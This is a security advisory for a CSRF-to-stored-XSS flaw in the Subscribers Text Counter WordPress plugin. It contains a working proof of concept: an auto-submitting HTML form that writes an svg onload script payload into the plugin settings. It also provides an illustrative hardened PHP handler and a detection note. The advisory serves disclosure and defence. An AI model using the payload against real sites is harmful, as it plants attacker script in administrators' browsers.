Source: wpexploit
Author: Pallab Jyoti Borah
WPEX-ID: 93FAAD5B-E1E8-4E49-B19E-B91343D68B51
Published: Aug 04, 2023 - 12:00 a.m.

Subscribers Text Counter < 1.7.1 - Settings Update via CSRF to Stored XSS

Tags: html, admin access, csrf, stored xss, settings update, plugin vulnerability, exploit

EPSS: 0.0005 (Low), Percentile: 17.1%

Description: The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack. Because the settings are neither sanitised nor escaped, this also leads to Stored Cross-Site Scripting.

Create an HTML file with the following content and have a logged-in admin access it:

```html
<body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/options-general.php?page=subscribers_text_counter" method="POST">
        <input type="text" name="twitter" value='"><svg/onload=alert(2);>'>
        <input type="text" name="stextcount_hidden" value="settings">
        <input type="submit" value="submit">
    </form>
</body>
```

Navigate to the plugin's settings to trigger the XSS.
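The advisory names three missing controls: a CSRF check on the settings update, sanitisation on save, and escaping on output. The handler below is an added illustrative example of a settings page that has all three, written for this advisory and not taken from the Subscribers Text Counter plugin or its fix; only the field names `twitter` and `stextcount_hidden` come from the PoC above, while the option name, nonce action string and hook are assumptions.

```php
<?php
// Illustrative hardened settings handler (added example, not the plugin's code).
// Assumed: option name 'stc_twitter', nonce action 'stc_save_settings'.
define( 'STC_NONCE_ACTION', 'stc_save_settings' );

// Persist settings only when the request is a deliberate action by an authorised admin.
function stc_handle_settings_post() {
    if ( ! isset( $_POST['stextcount_hidden'] ) || 'settings' !== $_POST['stextcount_hidden'] ) {
        return; // not a settings submission
    }

    // 1. Capability check: only users who may manage options can save them.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // 2. CSRF check: check_admin_referer() dies unless a valid nonce for this
    //    action is present. The PoC form carries no nonce, so it stops here.
    check_admin_referer( STC_NONCE_ACTION );

    // 3. Sanitise before storing: sanitize_text_field() strips tags and control
    //    characters, so a "><svg/onload=...> payload never reaches the database.
    $twitter = isset( $_POST['twitter'] )
        ? sanitize_text_field( wp_unslash( $_POST['twitter'] ) )
        : '';
    update_option( 'stc_twitter', $twitter );
}
add_action( 'admin_init', 'stc_handle_settings_post' );

// Render the form: emit the nonce field and escape stored values on output.
function stc_render_settings_form() {
    $twitter = get_option( 'stc_twitter', '' );
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( STC_NONCE_ACTION ); ?>
        <input type="hidden" name="stextcount_hidden" value="settings">
        <!-- 4. Escape on output: esc_attr() neutralises a stray quote even if a
             bad value was stored before the fix was applied. -->
        <input type="text" name="twitter" value="<?php echo esc_attr( $twitter ); ?>">
        <input type="submit" value="Save">
    </form>
    <?php
}
```

Detection-wise, a settings POST to `options-general.php?page=subscribers_text_counter` without a `_wpnonce` parameter, or with a `Referer` outside the site, is the request shape this PoC produces.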
